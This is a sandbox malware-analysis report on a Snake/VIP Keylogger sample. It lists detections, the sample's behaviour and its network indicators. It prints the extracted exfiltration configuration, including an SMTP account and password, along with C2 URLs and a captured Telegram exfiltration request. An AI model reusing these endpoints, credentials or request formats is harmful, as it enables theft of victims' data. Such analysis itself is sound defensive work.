Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z64BLPL.exe

Overview

General Information

Sample name:z64BLPL.exe
Analysis ID:1519553
MD5:9c7cf85d2fa1d9c0b6c591b94cbf2830
SHA1:55822a8ed3ceda0fc325d998af2e379fb05a948e
SHA256:fe777d4ff348afb74ba7556da56b29a4ee0a66f7b044674fd1f18641573337f2
Tags:exeuser-Porcupine
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Machine Learning detection for sample
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • z64BLPL.exe (PID: 7268 cmdline: "C:\Users\user\Desktop\z64BLPL.exe" MD5: 9C7CF85D2FA1D9C0B6C591B94CBF2830)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
z64BLPL.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    z64BLPL.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      z64BLPL.exeJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
        z64BLPL.exeJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
          z64BLPL.exeWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x2df58:$a1: get_encryptedPassword
          • 0x2e275:$a2: get_encryptedUsername
          • 0x2dd68:$a3: get_timePasswordChanged
          • 0x2de71:$a4: get_passwordField
          • 0x2df6e:$a5: set_encryptedPassword
          • 0x2f624:$a7: get_logins
          • 0x2f587:$a10: KeyLoggerEventArgs
          • 0x2f1ec:$a11: KeyLoggerEventArgsEventHandler
          Click to see the 2 entries
          SourceRuleDescriptionAuthorStrings
          00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
              00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                00000000.00000000.1673795940.0000000000692000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                • 0x2dd58:$a1: get_encryptedPassword
                • 0x2e075:$a2: get_encryptedUsername
                • 0x2db68:$a3: get_timePasswordChanged
                • 0x2dc71:$a4: get_passwordField
                • 0x2dd6e:$a5: set_encryptedPassword
                • 0x2f424:$a7: get_logins
                • 0x2f387:$a10: KeyLoggerEventArgs
                • 0x2efec:$a11: KeyLoggerEventArgsEventHandler
                00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
                  Click to see the 6 entries
                  SourceRuleDescriptionAuthorStrings
                  0.0.z64BLPL.exe.690000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0.0.z64BLPL.exe.690000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      0.0.z64BLPL.exe.690000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                        0.0.z64BLPL.exe.690000.0.unpackJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
                          0.0.z64BLPL.exe.690000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
                          • 0x2df58:$a1: get_encryptedPassword
                          • 0x2e275:$a2: get_encryptedUsername
                          • 0x2dd68:$a3: get_timePasswordChanged
                          • 0x2de71:$a4: get_passwordField
                          • 0x2df6e:$a5: set_encryptedPassword
                          • 0x2f624:$a7: get_logins
                          • 0x2f587:$a10: KeyLoggerEventArgs
                          • 0x2f1ec:$a11: KeyLoggerEventArgsEventHandler
                          Click to see the 2 entries

                          System Summary

                          barindex
                          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 192.250.231.25, DestinationIsIpv6: false, DestinationPort: 25, EventID: 3, Image: C:\Users\user\Desktop\z64BLPL.exe, Initiated: true, ProcessId: 7268, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49753
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-26T17:10:01.211022+020028033053Unknown Traffic192.168.2.449732188.114.97.3443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-09-26T17:09:59.130992+020028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                          2024-09-26T17:10:00.568500+020028032742Potentially Bad Traffic192.168.2.449730193.122.6.16880TCP
                          2024-09-26T17:10:22.605931+020028032742Potentially Bad Traffic192.168.2.449733193.122.6.16880TCP
                          2024-09-26T17:10:31.334225+020028032742Potentially Bad Traffic192.168.2.449740193.122.6.16880TCP
                          2024-09-26T17:10:35.905707+020028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP
                          2024-09-26T17:10:36.584155+020028032742Potentially Bad Traffic192.168.2.449742193.122.6.16880TCP
                          2024-09-26T17:10:38.849813+020028032742Potentially Bad Traffic192.168.2.449744193.122.6.16880TCP
                          2024-09-26T17:10:42.177920+020028032742Potentially Bad Traffic192.168.2.449746193.122.6.16880TCP
                          2024-09-26T17:10:43.662331+020028032742Potentially Bad Traffic192.168.2.449748193.122.6.16880TCP
                          2024-09-26T17:10:45.099812+020028032742Potentially Bad Traffic192.168.2.449750193.122.6.16880TCP

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: z64BLPL.exeAvira: detected
                          Source: http://aborters.duckdns.org:8081URL Reputation: Label: malware
                          Source: http://anotherarmy.dns.army:8081URL Reputation: Label: malware
                          Source: 0.0.z64BLPL.exe.690000.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "manoj@electradubai.com", "Password": "LordHaveMercy!!123", "Host": "mail.electradubai.com", "Port": "25", "Version": "4.4"}
                          Source: z64BLPL.exeReversingLabs: Detection: 73%
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                          Source: z64BLPL.exeJoe Sandbox ML: detected

                          Location Tracking

                          barindex
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: z64BLPL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49752 version: TLS 1.2
                          Source: z64BLPL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 00D3F2D5h0_2_00D3F138
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 00D3F2D5h0_2_00D3F324
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 00D3FA91h0_2_00D3F7EC
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 06693360h0_2_06692F48
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 06690D0Dh0_2_06690B30
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 06691697h0_2_06690B30
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 06692C21h0_2_06692970
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669D0C9h0_2_0669CE20
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669D979h0_2_0669D6D0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 06693360h0_2_06692F37
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669E229h0_2_0669DF80
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669EF31h0_2_0669EC88
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669F7E1h0_2_0669F538
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669D521h0_2_0669D278
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 06693360h0_2_0669328E
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669DDD1h0_2_0669DB28
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669E681h0_2_0669E3D8
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h0_2_06690040
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669EAD9h0_2_0669E830
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669F389h0_2_0669F0E0
                          Source: C:\Users\user\Desktop\z64BLPL.exeCode function: 4x nop then jmp 0669FC39h0_2_0669F990

                          Networking

                          barindex
                          Source: unknownDNS query: name: api.telegram.org
                          Source: Yara matchFile source: z64BLPL.exe, type: SAMPLE
                          Source: Yara matchFile source: 0.0.z64BLPL.exe.690000.0.unpack, type: UNPACKEDPE
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
                          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
                          Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                          Source: Joe Sandbox ViewASN Name: CNSV-LLCUS CNSV-LLCUS
                          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownDNS query: name: checkip.dyndns.org
                          Source: unknownDNS query: name: reallyfreegeoip.org
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49742 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49733 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49748 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49750 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49740 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49730 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49744 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49746 -> 193.122.6.168:80
                          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49732 -> 188.114.97.3:443
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.0
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20and%20Time:%2029/09/2024%20/%2005:52:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20494126%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                          Source: global trafficDNS traffic detected: DNS query: mail.electradubai.com
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 26 Sep 2024 15:10:46 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://51.38.247.67:8081/_send_.php?L
                          Source: z64BLPL.exeString found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
                          Source: z64BLPL.exeString found in binary or memory: http://aborters.duckdns.org:8081
                          Source: z64BLPL.exeString found in binary or memory: http://anotherarmy.dns.army:8081
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
                          Source: z64BLPL.exeString found in binary or memory: http://checkip.dyndns.org/q
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BA3000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.electradubai.com
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                          Source: z64BLPL.exeString found in binary or memory: http://varders.kozow.com:8081
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                          Source: z64BLPL.exeString found in binary or memory: https://api.telegram.org/bot
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:494126%0D%0ADate%20a
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002BD0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enlB
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                          Source: z64BLPL.exeString found in binary or memory: https://reallyfreegeoip.org/xml/
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002A60000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002A8B000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002AFA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33$
                          Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                          Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                          Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B64000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003CE1000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4120925537.0000000002B1D000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C93000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003DB6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                          Source: z64BLPL.exe, 00000000.00000002.4122665440.0000000003AF5000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003D92000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003ACA000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003B3F000.00000004.00000800.00020000.00000000.sdmp, z64BLPL.exe, 00000000.00000002.4122665440.0000000003C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                          Source: z64BLPL.exe, 00000000.00000002.4120925537.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
